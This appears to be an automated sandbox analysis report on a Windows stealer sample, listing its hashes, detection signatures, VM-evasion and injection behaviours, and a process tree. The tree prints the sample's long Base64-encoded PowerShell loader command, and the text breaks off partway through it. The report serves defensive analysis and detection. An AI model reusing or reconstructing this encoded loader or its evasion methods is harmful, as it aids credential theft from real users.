Edit tour
Windows
Analysis Report
dGhlYXB0Z3JvdXA=-free.exe
Overview
General Information
| Sample name: | dGhlYXB0Z3JvdXA=-free.exe |
| Analysis ID: | 1583221 |
| MD5: | ede0a1c97eaa446541dcfccd6fa9a6a7 |
| SHA1: | e578715a247461d460899af7302152c5daf4365e |
| SHA256: | 5a94644716cf1ab8c197ecad93562924c3bfb36224b8c0b68e26a252f3e713d8 |
| Tags: | EsqueleStealerexeFUDuser-aniko |
| Infos: |   |
 | |
Detection
| Score: | 72 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected Powershell decode and execute
Encrypted powershell cmdline option found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Use Short Name Path in Command Line
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
dGhlYXB0Z3JvdXA=-free.exe (PID: 6732 cmdline: "C:\Users\ user\Deskt op\dGhlYXB 0Z3JvdXA=- free.exe" MD5: EDE0A1C97EAA446541DCFCCD6FA9A6A7) 
conhost.exe (PID: 5264 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 1228 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Encoded W wBTAHkAcwB 0AGUAbQAuA FQAZQB4AHQ ALgBFAG4AY wBvAGQAaQB uAGcAXQA6A DoAVQBUAEY AOAAuAEcAZ QB0AFMAdAB yAGkAbgBnA CgAWwBTAHk AcwB0AGUAb QAuAEMAbwB uAHYAZQByA HQAXQA6ADo ARgByAG8Ab QBCAGEAcwB lADYANABTA HQAcgBpAG4 AZwAoACgAJ wB7ACIAUwB jAHIAaQBwA HQAIgA6ACI AYQBXAFkAZ wBLAEMAMQB 1AGIAMwBRA GcASwBGAHQ AVABlAFgAT gAwAFoAVwA wAHUAVABXA EYAdQBZAFc AZABsAGIAV wBWAHUAZAB DADUAQgBkA FgAUgB2AGI AVwBGADAAY QBXADkAdQB MAGwAQgBUA FYASABsAHc AWgBVADUAa ABiAFcAVgB kAEoAMQBkA HAAYgBqAE0 AeQBKAHkAa wB1AFYASAB sAHcAWgBTA GsAZwBlAHc AMABLAEkAQ wBBAGcASQB FAEYAawBaA EMAMQBVAGU AWABCAGwAS QBFAEEAaQB EAFEAbwBnA EkAQwBBAGc AZABYAE4Ac ABiAG0AYwB nAFUAMwBsA HoAZABHAFY AdABPAHcAM ABLAEkAQwB BAGcASQBIA FYAegBhAFc ANQBuAEkAR gBOADUAYwA zAFIAbABiA FMANQBTAGQ AVwA1ADAAY QBXADEAbAB MAGsAbAB1A GQARwBWAHk AYgAzAEIAV ABaAFgASgA yAGEAVwBOA GwAYwB6AHM ATgBDAGcAM ABLAEkAQwB BAGcASQBIA EIAMQBZAG0 AeABwAFkAe QBCAGoAYgB HAEYAegBjA HkAQgBYAGE AVwA0AHoAT QBpAEIANwB EAFEAbwBnA EkAQwBBAGc ASQBDAEEAZ wBJAEYAdAB FAGIARwB4A EoAYgBYAEI AdgBjAG4AU QBvAEkAbgB WAHoAWgBYA EkAegBNAGk ANQBrAGIAR wB3AGkASwB WADAATgBDA GkAQQBnAEk AQwBBAGcAS QBDAEEAZwB jAEgAVgBpA GIARwBsAGo ASQBIAE4AM ABZAFgAUgB wAFkAeQBCA GwAZQBIAFI AbABjAG0AN ABnAFMAVwA 1ADAAVQBIA FIAeQBJAEU AZABsAGQAR QBaAHYAYwB tAFYAbgBjA G0AOQAxAGI AbQBSAFgAY QBXADUAawB iADMAYwBvA EsAVABzAE4 AQwBnADAAS wBJAEMAQQB nAEkAQwBBA GcASQBDAEI AYgBSAEcAe ABzAFMAVwA xAHcAYgAzA EoAMABLAEM ASgAxAGMAM gBWAHkATQB 6AEkAdQBaA EcAeABzAEk AaQBsAGQAR ABRAG8AZwB JAEMAQQBnA EkAQwBBAGc ASQBGAHQAe QBaAFgAUgA xAGMAbQA0A DYASQBFADE AaABjAG4AT gBvAFkAVwB 4AEIAYwB5A GgAVgBiAG0 AMQBoAGIAb QBGAG4AWgB XAFIAVQBlA FgAQgBsAEw AawBKAHYAY gAyAHcAcAB YAFEAMABLA EkAQwBBAGc ASQBDAEEAZ wBJAEMAQgB 3AGQAVwBKA HMAYQBXAE0 AZwBjADMAU gBoAGQARwB sAGoASQBHA FYANABkAEc AVgB5AGIAa QBCAGkAYgA yADkAcwBJA EYATgBvAGI AMwBkAFgAY QBXADUAawB iADMAYwBvA FMAVwA1ADA AVQBIAFIAe QBJAEcAaAB YAGIAbQBRA HMASQBHAGw AdQBkAEMAQ gB1AFEAMgA xAGsAVQAyA GgAdgBkAHk AawA3AEQAU QBvAGcASQB DAEEAZwBmA FEAMABLAEk AawBBAE4AQ wBuADAATgB DAG0AWgAxA GIAbQBOADA AYQBXADkAd QBJAEUAZAB sAGQARQBGA GoAZABHAGw AMgBaAFYAZ ABwAGIAbQB SAHYAZAAxA FIAcABkAEc AeABsAEsAQ wBrAGcAZQB 3ADAASwBJA EMAQQBnAEk AQwBSAG8AV gAyADUAawB JAEQAMABnA FcAMQBkAHA AYgBqAE0Ae QBYAFQAbwA 2AFIAMgBWA DAAUgBtADk AeQBaAFcAZ AB5AGIAMwB WAHUAWgBGA GQAcABiAG0 AUgB2AGQAe QBnAHAARAB RAG8AZwBJA EMAQQBnAEo ASABOAGkAS QBEADAAZwB UAG0AVgAzA EwAVQA5AGk AYQBtAFYAa gBkAEMAQgB UAGUAWABOA DAAWgBXADA AdQBWAEcAV gA0AGQAQwA 1AFQAZABIA EoAcABiAG0 AZABDAGQAV wBsAHMAWgB HAFYAeQBLA EQASQAxAE4 AaQBrAE4AQ wBpAEEAZwB JAEMAQgBiA FYAMgBsAHU ATQB6AEoAZ ABPAGoAcAB IAFoAWABSA FgAYQBXADU AawBiADMAZ ABVAFoAWAB oADAASwBDA FIAbwBWADI